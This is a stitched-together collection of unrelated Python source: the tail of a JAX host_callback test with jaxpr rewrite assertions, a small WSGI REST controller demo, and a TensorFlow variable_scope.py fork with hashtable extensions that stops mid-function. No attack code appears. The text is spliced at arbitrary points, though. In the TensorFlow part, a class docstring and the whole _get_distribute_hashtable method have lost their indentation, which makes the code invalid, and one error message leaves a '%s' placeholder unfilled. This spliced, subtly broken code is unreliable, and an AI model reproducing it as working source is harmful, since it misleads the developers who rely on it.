let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
  def test_scan_custom_vjp(self):
    """custom VJP, inside scan.

    This exercises the custom_vjp_call_jaxpr primitives."""

    @api.custom_vjp
    def f(x):
      return x * hcb.id_print(x)

    # f_fwd: a -> (b, residual)
    def f_fwd(x):
      return f(x), 3. * x

    # f_bwd: (residual, CT b) -> [CT a]
    def f_bwd(residual, ct_b):
      return residual * hcb.id_print(ct_b),

    f.defvjp(f_fwd, f_bwd)

    def g(x):
      # Sum f(x_i)
      return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
                      np.full(x.shape[1:], 0.),  # Like x w/o leading dim
                      x)[0]

    arg = np.full((2,), 0.7)
    # Primal: same shape as the custom_jvp case — the tap inside fun_jaxpr is
    # rewritten to outside_call with the token threaded through the scan carry.
    self.assertRewrite("""
        { lambda ; a c d.
          let b e f _ =
                scan[ jaxpr={ lambda ; a e f b.
                              let c g h = custom_vjp_call_jaxpr[
                                             fun_jaxpr={ lambda ; a d e.
                                                         let b f g = outside_call[ arg_treedef=*
                                                                                   callback=...
                                                                                   has_token=True
                                                                                   identity=True ] a d e
                                                             c = mul a b
                                                         in (c, f, g) }
                                             num_consts=0
                                          ] b e f
                                  d = add a c
                              in (d, g, h, 0.00) }
                      length=2
                      linear=(False, False, False, False)
                      num_carry=3
                      num_consts=0
                      reverse=False
                      unroll=1 ] 0.00 c d a
          in (b, e, f) }""", g, [arg])
    # Gradient: forward scan followed by a reverse scan that runs the user's
    # f_bwd, whose id_print becomes an outside_call in the backward body.
    self.assertRewrite("""
        { lambda ; a d e.
          let _ _ f g _ b =
                scan[ jaxpr={ lambda ; a b h i c d.
                              let e j k = custom_vjp_call_jaxpr[
                                             fun_jaxpr={ lambda ; a d e.
                                                         let b f g = outside_call[ arg_treedef=*
                                                                                   callback=...
                                                                                   has_token=True
                                                                                   identity=True ] a d e
                                                             c = mul a b
                                                         in (c, f, g) }
                                             num_consts=0
                                          ] c h i
                                  f = add a e
                                  g = mul c 3.00
                              in (f, *, j, k, 0.00, g) }
                      length=2
                      linear=(False, True, False, False, False, True)
                      num_carry=4
                      num_consts=0
                      reverse=False
                      unroll=1 ] 0.00 * d e a *
              _ _ h i _ c =
                scan[ jaxpr={ lambda ; a b g h c d.
                              let e i j = outside_call[ arg_treedef=*
                                                        callback=...
                                                        has_token=True
                                                        identity=True ] b g h
                                  f = mul d e
                              in (*, b, i, j, *, f) }
                      length=2
                      linear=(True, True, False, False, True, False)
                      num_carry=4
                      num_consts=0
                      reverse=True
                      unroll=1 ] * 1.00 f g * b
          in (c, h, i) }""", api.grad(g), [arg])
  def test_remat_loop(self):
    # id_print inside a remat'ed function used as a fori_loop body: the token
    # must be threaded through both the remat_call and the enclosing while.
    def f(k, x):
      x = hcb.id_print(k + x)
      return -k * x

    def loss(k):
      return lax.fori_loop(0, 1, api.remat(f), k)

    self.assertRewrite("""
        { lambda ; a c d.
          let _ _ b e f =
                while[ body_jaxpr={ lambda ; a b c f g.
                                    let d = add a 1
                                        e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
                                                                         let c = add a b
                                                                             d i j = outside_call[ arg_treedef=*
                                                                                                   callback=...
                                                                                                   has_token=True
                                                                                                   identity=True ] c g h
                                                                             e = neg a
                                                                             f = mul e d
                                                                         in (f, i, j) }
                                                            concrete=False
                                                            name=f ] a c f g
                                    in (d, b, e, h, i) }
                       body_nconsts=0
                       cond_jaxpr={ lambda ; a b c e f.
                                    let d = lt a b
                                    in (d,) }
                       cond_nconsts=0 ] 0 1 a c d
          in (b, e, f) }""", loss, [2])
  def test_named_call(self):
    # With do_print=False the body taps nothing, so the named_call's
    # call_jaxpr is left untouched by the rewrite; only the surrounding
    # jaxpr gains the pass-through token outputs (d, e).
    def tap_scalar(init, do_print=False):
      @partial(api.named_call, name="step")
      def step(acc, step_nr):
        acc = acc + step_nr
        maybe_print(do_print, step_nr, what="step_nr")
        return acc, None
      return lax.scan(step, init, np.arange(2, dtype=np.int32))

    self.assertRewrite("""
        { lambda a ; b d e.
          let c = scan[ jaxpr={ lambda ; a b.
                                let c = named_call[ call_jaxpr={ lambda ; a b.
                                                                 let c = add a b
                                                                 in (c,) }
                                                    name=step ] a b
                                in (c,) }
                        length=2
                        linear=(False, False)
                        num_carry=1
                        num_consts=0
                        reverse=False
                        unroll=1 ] b a
          in (c, d, e) }""", tap_scalar, [np.int32(3)])
  def test_pmap(self):
    def f(xv):
      api.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
               axis_name="i")(xv)

    # The pmapped call_jaxpr gains token inputs/outputs; in_axes/out_axes
    # grow to three entries to cover the two threaded token values.
    self.assertRewrite("""
        { lambda ; a b c.
          let _ d e = xla_pmap[ axis_name=i
                                axis_size=1
                                backend=None
                                call_jaxpr={ lambda ; a d e.
                                             let b f g = outside_call[ arg_treedef=*
                                                                       callback=...
                                                                       has_token=True
                                                                       identity=True ] a d e
                                                 c = sin b
                                             in (c, f, g) }
                                devices=None
                                donated_invars=(False, False, False)
                                global_arg_shapes=(None,)
                                global_axis_size=None
                                in_axes=(0, 0, 0)
                                name=<lambda>
                                out_axes=(0, 0, 0) ] a b c
          in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
# Standard test entry point: run under absltest with the project's test
# loader (jtu.JaxTestLoader — presumably adds JAX-specific test selection).
if __name__ == "__main__":
  absltest.main(testLoader=jtu.JaxTestLoader())
|
web_10.py | from web_06 import WSGIApplication
# Module-level application instance; the @app.route decorators below register
# their controllers on it, and the demo code at the bottom serves it.
app = WSGIApplication()
class RestController:
    """Base controller that dispatches a request to a method named after the
    HTTP verb (``GET``, ``POST``, ...), falling back to ``_not_found``.

    Subclasses implement upper-case verb methods with signature
    ``(self, req, resp) -> bytes``.
    """

    def __call__(self, req, resp):
        method = req.environ['REQUEST_METHOD']
        # Only dispatch to explicit upper-case verb handlers. REQUEST_METHOD
        # comes from the client, so an unrestricted getattr() would let a
        # crafted method name (e.g. '__call__', '_not_found', 'RESOURCES')
        # reach internal attributes.
        if method.isupper() and not method.startswith('_'):
            action = getattr(self, method, self._not_found)
        else:
            action = self._not_found
        return action(req, resp)

    def _not_found(self, environ, resp):
        # NOTE: the first argument actually receives the request object (see
        # the positional call above); the name is kept for compatibility.
        resp.status = '404 Not Found'
        return b'{}'  # Provide an empty JSON document
import json
@app.route('/resources/?(?P<id>\\w*)')
class ResourcesRestController(RestController):
    """CRUD-style REST controller for an in-memory resource catalog.

    The URL pattern captures an optional ``id`` group: an empty id addresses
    the whole catalog, a non-empty id a single resource.
    """

    # Class-level store: shared across all requests (and instances).
    RESOURCES = {}

    def GET(self, req, resp):
        """Return the whole catalog, or one resource by id (404 if absent)."""
        resource_id = req.urlargs['id']
        if not resource_id:
            # Whole catalog requested
            return json.dumps(self.RESOURCES).encode('utf-8')
        if resource_id not in self.RESOURCES:
            return self._not_found(req, resp)
        return json.dumps(self.RESOURCES[resource_id]).encode('utf-8')

    def POST(self, req, resp):
        """Create a resource from the JSON request body and echo it back."""
        content_length = int(req.environ['CONTENT_LENGTH'])
        data = req.environ['wsgi.input'].read(content_length).decode('utf-8')
        resource = json.loads(data)
        # NOTE(review): ids derived from len() can collide after a DELETE;
        # kept as-is to preserve the example's behavior.
        resource['id'] = str(len(self.RESOURCES)+1)
        self.RESOURCES[resource['id']] = resource
        return json.dumps(resource).encode('utf-8')

    def DELETE(self, req, resp):
        """Delete a resource by id; responds 204 (idempotent if absent)."""
        resource_id = req.urlargs['id']
        if not resource_id:
            return self._not_found(req, resp)
        self.RESOURCES.pop(resource_id, None)
        # BUG FIX: the status belongs on the response object. The original
        # assigned `req.status`, so the 204 was silently dropped and the
        # response kept its default status (compare _not_found, which sets
        # resp.status).
        resp.status = '204 No Content'
        return b''
# Serve the app in the background so the demo requests below can reach it.
# NOTE(review): there is no wait for the server socket to be ready, so the
# first request may race server startup — confirm app.serve binds promptly.
import threading
threading.Thread(target=app.serve, daemon=True).start()
from web_03 import http_request
# Create a first resource and list the catalog.
_, resp = http_request('http://localhost:8000/resources', method='POST',
                       data=json.dumps({'name': 'Mario',
                                        'surname': 'Mario'}).encode('utf-8'))
print('NEW RESOURCE: ', resp)
_, resp = http_request('http://localhost:8000/resources')
print('ALL RESOURCES: ', resp)
# Create a second resource and list again.
http_request('http://localhost:8000/resources', method='POST',
             data=json.dumps({'name': 'Luigi',
                              'surname': 'Mario'}).encode('utf-8'))
_, resp = http_request('http://localhost:8000/resources')
print('ALL RESOURCES: ', resp)
# Fetch one resource by id, delete the other, and list once more.
_, resp = http_request('http://localhost:8000/resources/1')
print('RESOURCES #1: ', resp)
http_request('http://localhost:8000/resources/2', method='DELETE')
_, resp = http_request('http://localhost:8000/resources')
print('ALL RESOURCES', resp)
|
variable_scope.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange, zip # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import kv_variable_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
# Public API of this module. Note: includes embedding/hashtable extensions
# (get_embedding_variable, get_hash_table, ...) on top of the stock
# TensorFlow symbols — presumably project-specific additions.
__all__ = [
    "AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
    "get_local_variable", "variable_scope", "variable_op_scope",
    "no_regularizer", "VariableSynchronization", "VariableAggregation",
    "get_embedding_variable", "get_dynamic_dimension_embedding_variable",
    "get_multihash_variable", "get_hash_table"
]

# Telemetry gauge flipped by enable/disable_resource_variables() below.
_api_usage_gauge = monitoring.BoolGauge(
    "/tensorflow/api/resource_variables",
    "Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
  """Holds partition info used by initializer functions."""

  def __init__(self, full_shape, var_offset):
    """Constructor.

    Args:
      full_shape: Tuple or list of `int` indicating the full combined shape of
        the partitioned variables.
      var_offset: Tuple or list of `int` specifying offset of this partition
        with respect to the full variable for each dimension.

    Raises:
      TypeError: If `full_shape` or `var_offset` is not a sequence.
      ValueError: If `full_shape` or `var_offset` differ in length. If
        `var_offset` exceeds `full_shape` in any dimension.
    """
    # Validate both arguments the same way: must be a non-string sequence.
    # (Strings are Sequences too, hence the explicit exclusion.)
    # NOTE(review): collections_lib.Sequence is the pre-3.10 alias of
    # collections.abc.Sequence; removed from `collections` in Python 3.10.
    for arg_name, seq in (("full_shape", full_shape),
                          ("var_offset", var_offset)):
      if (not isinstance(seq, collections_lib.Sequence) or
          isinstance(seq, six.string_types)):
        raise TypeError(
            "`" + arg_name + "` must be a sequence (like tuple or list) "
            "instead of " + type(seq).__name__)

    if len(var_offset) != len(full_shape):
      raise ValueError(
          "Expected equal length, but `var_offset` is of length {} while "
          "full_shape is of length {}.".format(
              len(var_offset), len(full_shape)))

    # Every per-dimension offset must lie inside the full shape.
    for offset, dim in zip(var_offset, full_shape):
      if not 0 <= offset < dim:
        raise ValueError(
            "Expected 0 <= offset < shape but found offset={}, shape={} for "
            "var_offset={}, full_shape={}".format(offset, dim, var_offset,
                                                  full_shape))

    self._full_shape = full_shape
    self._var_offset = var_offset

  @property
  def full_shape(self):
    """Full combined shape of the partitioned variable."""
    return self._full_shape

  @property
  def var_offset(self):
    """Per-dimension offset of this partition within the full variable."""
    return self._var_offset

  def single_offset(self, shape):
    """Returns the offset when the variable is partitioned in at most one dim.

    Args:
      shape: Tuple or list of `int` indicating the shape of one specific
        variable partition.

    Returns:
      `int` representing the offset in the dimension along which the variable
      is partitioned. Returns 0 if the variable is not being partitioned.

    Raises:
      ValueError: Depending on self.single_slice_dim().
    """
    sliced_dim = self.single_slice_dim(shape)
    # single_slice_dim() returns None for an unpartitioned variable.
    return 0 if sliced_dim is None else self.var_offset[sliced_dim]

  def single_slice_dim(self, shape):
    """Returns the slice dim when the variable is partitioned only in one dim.

    Args:
      shape: Tuple or list of `int` indicating the shape of one specific
        variable partition.

    Returns:
      `int` representing the dimension that the variable is partitioned in, or
      `None` if the variable doesn't seem to be partitioned at all.

    Raises:
      TypeError: If `shape` is not a sequence.
      ValueError: If `shape` is not the same length as `self.full_shape`. If
        the variable is partitioned in more than one dimension.
    """
    if (not isinstance(shape, collections_lib.Sequence) or
        isinstance(shape, six.string_types)):
      raise TypeError(
          "`shape` must be a sequence (like tuple or list) instead of " +
          type(shape).__name__)

    if len(shape) != len(self.full_shape):
      raise ValueError(
          "Expected equal length, but received shape={} of length {} while "
          "self.full_shape={} is of length {}.".format(shape, len(shape),
                                                       self.full_shape,
                                                       len(self.full_shape)))

    # The partition must fit inside the full variable in every dimension.
    for dim, (offset, part_extent, full_extent) in enumerate(
        zip(self.var_offset, shape, self.full_shape)):
      if offset + part_extent > full_extent:
        raise ValueError(
            "With self.var_offset={}, a partition of shape={} would exceed "
            "self.full_shape={} in dimension {}.".format(
                self.var_offset, shape, self.full_shape, dim))

    # A dimension is "sliced" when the partition extent differs from the
    # full extent; at most one such dimension is allowed.
    slice_dim = None
    for dim, (part_extent, full_extent) in enumerate(
        zip(shape, self.full_shape)):
      if part_extent == full_extent:
        continue
      if slice_dim is not None:
        raise ValueError(
            "Cannot use single_slice_dim() with shape={} and "
            "self.full_shape={} since slice dim could be either dimension {} "
            "or {}.".format(shape, self.full_shape, dim, slice_dim))
      slice_dim = dim
    return slice_dim
class _ReuseMode(enum.Enum):
  """Mode for variable access within a variable scope."""

  # Indicates that variables are to be fetched if they already exist or
  # otherwise created.
  AUTO_REUSE = 1

  # TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
  # enum values.
  # REUSE_FALSE = 2
  # REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization  # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation  # pylint: disable=invalid-name

# Public sentinel for `reuse`: "reuse the variable if it exists, else create".
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""

# Module-wide default for `use_resource`; resource variables are the default
# when TF2 behavior is enabled.
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
  """Creates resource variables by default.

  Resource variables are improved versions of TensorFlow variables with a
  well-defined memory model. Accessing a resource variable reads its value, and
  all ops which access a specific read value of the variable are guaranteed to
  see the same value for that tensor. Writes which happen after a read (by
  having a control or data dependency on the read) are guaranteed not to affect
  the value of the read tensor, and similarly writes which happen before a read
  are guaranteed to affect the value. No guarantees are made about unordered
  read/write pairs.

  Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
  feature.
  """
  global _DEFAULT_USE_RESOURCE
  _DEFAULT_USE_RESOURCE = True
  # Record the opt-in for API usage telemetry.
  _api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
  """Returns `True` if resource variables are enabled.

  Resource variables are improved versions of TensorFlow variables with a
  well-defined memory model. Accessing a resource variable reads its value, and
  all ops which access a specific read value of the variable are guaranteed to
  see the same value for that tensor. Writes which happen after a read (by
  having a control or data dependency on the read) are guaranteed not to affect
  the value of the read tensor, and similarly writes which happen before a read
  are guaranteed to affect the value. No guarantees are made about unordered
  read/write pairs.

  Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
  feature.
  """
  # Reading a module-level name needs no `global` declaration — the original
  # `global _DEFAULT_USE_RESOURCE` here was a (misleading) no-op, since
  # `global` is only required for assignment.
  return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
    None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
  """Opts out of resource variables.

  If your code needs tf.disable_resource_variables() to be called to work
  properly please file a bug.
  """
  global _DEFAULT_USE_RESOURCE
  _DEFAULT_USE_RESOURCE = False
  # Record the opt-out for API usage telemetry.
  _api_usage_gauge.get_cell().set(False)
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
  def __init__(self):
    """Create a variable store."""
    self._vars = {}  # A dictionary of the stored TensorFlow variables.
    self._partitioned_vars = {}  # A dict of the stored PartitionedVariables.
    # Set externally (not visible here) — presumably by EagerVariableStore;
    # when True, eager reuse is permitted (see get_variable/get_hashtable).
    self._store_eager_variables = False
  def get_hashtable(self,
                    name,
                    shape=None,
                    dtype=dtypes.float32,
                    initializer=None,
                    collections=None,
                    reuse=None,
                    trainable=None,
                    synchronization=VariableSynchronization.AUTO,
                    partitioner=None,
                    children=None):
    """Gets an existing hashtable with these parameters or creates a new one.

    Dispatches to `_get_distribute_hashtable` when `partitioner` is given,
    otherwise to `_get_hashtable`.

    NOTE(review): `synchronization` is accepted but never forwarded to either
    helper — confirm whether that is intentional.

    Raises:
      RuntimeError: in eager mode when `reuse` is requested without an active
        EagerVariableStore.
      ValueError: if `partitioner` is given but is not callable (raised inside
        the getter); see the helpers for reuse-related errors.
    """
    if context.executing_eagerly():
      if not self._store_eager_variables and reuse:
        raise RuntimeError(
            "When eager execution is enabled variable reuse is only supported"
            " when an EagerVariableStore is active. See the documentation on"
            " EagerVariableStore for example usage.")
      if self._store_eager_variables:
        reuse = AUTO_REUSE

    try:
      dtype = dtype.base_dtype
    except AttributeError:
      # .base_dtype not existing means that we will try and use the raw dtype
      # which was passed in - this might be a NumPy type which is valid.
      pass

    def _hashtable_getter(name,
                          shape=None,
                          dtype=dtypes.float32,
                          initializer=None,
                          collections=None,
                          reuse=None,
                          trainable=None,
                          partitioner=None,
                          children=None):
      # HashTable cases
      if partitioner is not None:
        if not callable(partitioner):
          raise ValueError(
              "Partitioner must be callable, but received: %s" % partitioner)
        return self._get_distribute_hashtable(name=name,
                                              shape=shape,
                                              dtype=dtype,
                                              initializer=initializer,
                                              collections=collections,
                                              reuse=reuse,
                                              trainable=trainable,
                                              partitioner=partitioner,
                                              children=children)
      else:
        return self._get_hashtable(name=name,
                                   shape=shape,
                                   dtype=dtype,
                                   initializer=initializer,
                                   reuse=reuse,
                                   collections=collections,
                                   trainable=trainable,
                                   partitioner=partitioner,
                                   children=children)

    return _hashtable_getter(name,
                             shape=shape,
                             dtype=dtype,
                             initializer=initializer,
                             collections=collections,
                             reuse=reuse,
                             trainable=trainable,
                             partitioner=partitioner,
                             children=children)
  def _get_hashtable(self,
                     name,
                     shape=None,
                     dtype=dtypes.float32,
                     initializer=None,
                     reuse=None,
                     collections=None,
                     trainable=None,
                     partitioner=None,
                     children=None):
    """Gets or creates a single (non-partitioned) `HashTable`.

    Reuse semantics mirror `get_variable`: with `reuse=True` the table must
    already exist; with `reuse=False` it must not; `None`/`AUTO_REUSE` accept
    either. An existing entry must be a `HashTable` with compatible shape and
    dtype.
    """
    # Local import — presumably to avoid an import cycle; TODO confirm.
    from tensorflow.python.ops.hash_table import hash_table
    if context.executing_eagerly():
      raise NotImplementedError("Hashtable variables are not yet supported "
                                "when eager execution is enabled.")
    if partitioner is not None:
      raise ValueError(
          "Trying to get a hashtable %s, but partitioner is not None." % name)
    if name in self._vars:
      # Reuse path: validate the existing entry against the request.
      if reuse is False:
        raise ValueError(
            "Hashtable variable with name %s already exists. Did you mean to "
            "set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
            % name)
      existing_var = self._vars[name]
      shape = tensor_shape.as_shape(shape)
      if not isinstance(existing_var, hash_table.HashTable):
        raise ValueError(
            "Trying to reuse hashtable variable %s, but an existing variable is not"
            " a HashTable, can not reuse it." % (name))
      if not shape.is_compatible_with(existing_var.shape):
        raise ValueError(
            "Trying to reuse hashtable variable %s, but specified shape %s "
            "and found shape %s."
            % (name, shape, existing_var.get_shape()))
      if not dtype.is_compatible_with(existing_var.dtype):
        raise ValueError(
            "Trying to reuse hashtable variable %s, but specified dtype %s "
            "and found dtype %s."
            % (name, dtype.name, existing_var.dtype.name))
      return existing_var
    # Creation path.
    if reuse is True:
      raise ValueError("Hashtable %s does not exist, or was not "
                       "created with tf.get_variable(). Did you mean to set "
                       "reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
    hashtable_var = hash_table.HashTable(shape=shape,
                                         dtype=dtype,
                                         distributed_name=name,
                                         initializer=initializer,
                                         collections=collections,
                                         trainable=trainable,
                                         children=children,
                                         name=name)
    self._vars[name] = hashtable_var
    return hashtable_var
def _get_distribute_hashtable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
reuse=None,
collections=None,
trainable=None,
partitioner=None,
children=None):
from tensorflow.python.ops.hash_table import hash_table
if context.executing_eagerly():
raise NotImplementedError("Distribute Hashtable variables are not yet supported "
"when eager execution is enabled.")
if partitioner is None:
raise ValueError(
"Trying to get a distribute hashtable %s, but partitioner is not specified." % name)
if name in self._vars:
raise ValueError(
"A distribute hashtable was provided, but an single version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created with single?" % name)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Hashtable variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not isinstance(existing_var, hash_table.DistributedHashTable):
raise ValueError(
"Trying to reuse distribute hashtable variable %s, but an existing variable is not"
" a DistributedHashTable, can not reuse it." % (name))
shape = tensor_shape.as_shape(shape)
if not shape.is_compatible_with(existing_var.shape):
raise ValueError(
"Trying to reuse distribute hashtable variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse distribute hashtable variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
cur_slicer = partitioner(hash_table.DistributedHashTable._DEFAULT_SLICER_SIZE)
if cur_slicer != existing_var._slicer:
raise ValueError(
"Trying to reuse distribute hashtable variable %s, but specified partitioner split result is not equal to origin: [{}, {}]".format(cur_slicer, existing_var._slicer))
return existing_var
if reuse is True:
raise ValueError("Distribute hashtable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
distribute_hashtable_var = hash_table.DistributedHashTable(shape=shape,
dtype=dtype,
initializer=initializer,
collections=collections,
trainable=trainable,
partitioner=partitioner,
children=children,
name=name)
for i in range(len(distribute_hashtable_var.partitions)):
hashtable_full_name = "%s/HashTable_%d" % (name, i)
if hashtable_full_name in self._vars:
raise ValueError("Hashtable variable with name %s already exists. Conflict when create "
"distribute hashtable with partition %d." % (hashtable_full_name, i))
self._vars[hashtable_full_name] = distribute_hashtable_var.partitions[i]
self._partitioned_vars[name] = distribute_hashtable_var
return distribute_hashtable_var
  def get_variable(self,
                   name,
                   shape=None,
                   embedding_block_num=None,
                   dtype=dtypes.float32,
                   initializer=None,
                   regularizer=None,
                   reuse=None,
                   trainable=None,
                   collections=None,
                   caching_device=None,
                   partitioner=None,
                   validate_shape=True,
                   use_resource=None,
                   custom_getter=None,
                   constraint=None,
                   synchronization=VariableSynchronization.AUTO,
                   aggregation=VariableAggregation.NONE,
                   invalid_key=None,
                   evconfig=variables.EmbeddingVariableConfig(),
                   ht_partition_num=1000):
    """Gets an existing variable with these parameters or create a new one.

    If a variable with the given name is already stored, we return the stored
    variable. Otherwise, we create a new one.

    Set `reuse` to `True` when you only want to reuse existing Variables.
    Set `reuse` to `False` when you only want to create new Variables.
    Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
    variables to be created if they don't exist or returned if they do.

    If initializer is `None` (the default), the default initializer passed in
    the constructor is used. If that one is `None` too, we use a new
    `glorot_uniform_initializer`. If initializer is a Tensor, we use
    it as a value and derive the shape from the initializer.

    If a partitioner is provided, a `PartitionedVariable` is returned.
    Accessing this object as a `Tensor` returns the shards concatenated along
    the partition axis.

    Some useful partitioners are available. See, e.g.,
    `variable_axis_size_partitioner` and `min_max_variable_partitioner`.

    Args:
      name: The name of the new or existing variable.
      shape: Shape of the new or existing variable.
      embedding_block_num: NOTE(review): extension parameter, forwarded to the
        single/partitioned getters — semantics not visible here.
      dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
      initializer: Initializer for the variable.
      regularizer: A (Tensor -> Tensor or None) function; the result of applying
        it on a newly created variable will be added to the collection
        GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
      reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
        variables. When eager execution is enabled this argument is always
        forced to be False.
      trainable: If `True` also add the variable to the graph collection
        `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
        defaults to `True`, unless `synchronization` is set to `ON_READ`, in
        which case it defaults to `False`.
      collections: List of graph collections keys to add the `Variable` to.
        Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
      caching_device: Optional device string or function describing where the
        Variable should be cached for reading. Defaults to the Variable's
        device. If not `None`, caches on another device. Typical use is to
        cache on the device where the Ops using the `Variable` reside, to
        deduplicate copying through `Switch` and other conditional statements.
      partitioner: Optional callable that accepts a fully defined `TensorShape`
        and dtype of the `Variable` to be created, and returns a list of
        partitions for each axis (currently only one axis can be partitioned).
      validate_shape: If False, allows the variable to be initialized with a
        value of unknown shape. If True, the default, the shape of initial_value
        must be known.
      use_resource: If False, creates a regular Variable. If True, creates
        instead an experimental ResourceVariable which has well-defined
        semantics. Defaults to False (will later change to True). When eager
        execution is enabled this argument is always forced to be true.
      custom_getter: Callable that takes as a first argument the true getter,
        and allows overwriting the internal get_variable method. The signature
        of `custom_getter` should match that of this method,
        but the most future-proof version will allow for changes: `def
        custom_getter(getter, *args, **kwargs)`. Direct access to
        all `get_variable` parameters is also allowed: `def
        custom_getter(getter, name, *args, **kwargs)`. A simple identity
        custom getter that simply creates variables with modified names is:
        ```python
        def custom_getter(getter, name, *args, **kwargs): return getter(name +
        '_suffix', *args, **kwargs) ```
      constraint: An optional projection function to be applied to the variable
        after being updated by an `Optimizer` (e.g. used to implement norm
        constraints or value constraints for layer weights). The function must
        take as input the unprojected Tensor representing the value of the
        variable and return the Tensor for the projected value (which must have
        the same shape). Constraints are not safe to use when doing asynchronous
        distributed training.
      synchronization: Indicates when a distributed a variable will be
        aggregated. Accepted values are constants defined in the class
        `tf.VariableSynchronization`. By default the synchronization is set to
        `AUTO` and the current `DistributionStrategy` chooses when to
        synchronize.
      aggregation: Indicates how a distributed variable will be aggregated.
        Accepted values are constants defined in the class
        `tf.VariableAggregation`.
      invalid_key: NOTE(review): embedding-variable extension parameter —
        semantics not visible here.
      evconfig: NOTE(review): `EmbeddingVariableConfig` extension parameter —
        semantics not visible here.
      ht_partition_num: NOTE(review): hashtable partition count for the
        embedding extension — semantics not visible here.

    Returns:
      The created or existing `Variable` (or `PartitionedVariable`, if a
      partitioner was used).

    Raises:
      ValueError: when creating a new variable and shape is not declared,
        when reusing a variable and specifying a conflicting shape,
        or when violating reuse during variable creation.
      RuntimeError: when eager execution is enabled and not called from an
        EagerVariableStore.
    """
    if custom_getter is not None and not callable(custom_getter):
      raise ValueError("Passed a custom_getter which is not callable: %s" %
                       custom_getter)
    with ops.init_scope():
      if context.executing_eagerly():
        # Variable creation and initialization takes place in `init_scope`s;
        # as such, if an `init_scope` lifts us into the eager context, then we
        # need to use `ResourceVariable`s.
        use_resource = True

    # Note that it's fine to reuse eager variables whose initialization was
    # lifted from a function-building graph into the eager context (that's why
    # the following clause is not wrapped in an `init_scope`); lifted variables
    # are tracked by the graph's `VariableStore`.
    if context.executing_eagerly():
      if not self._store_eager_variables and reuse:
        raise RuntimeError(
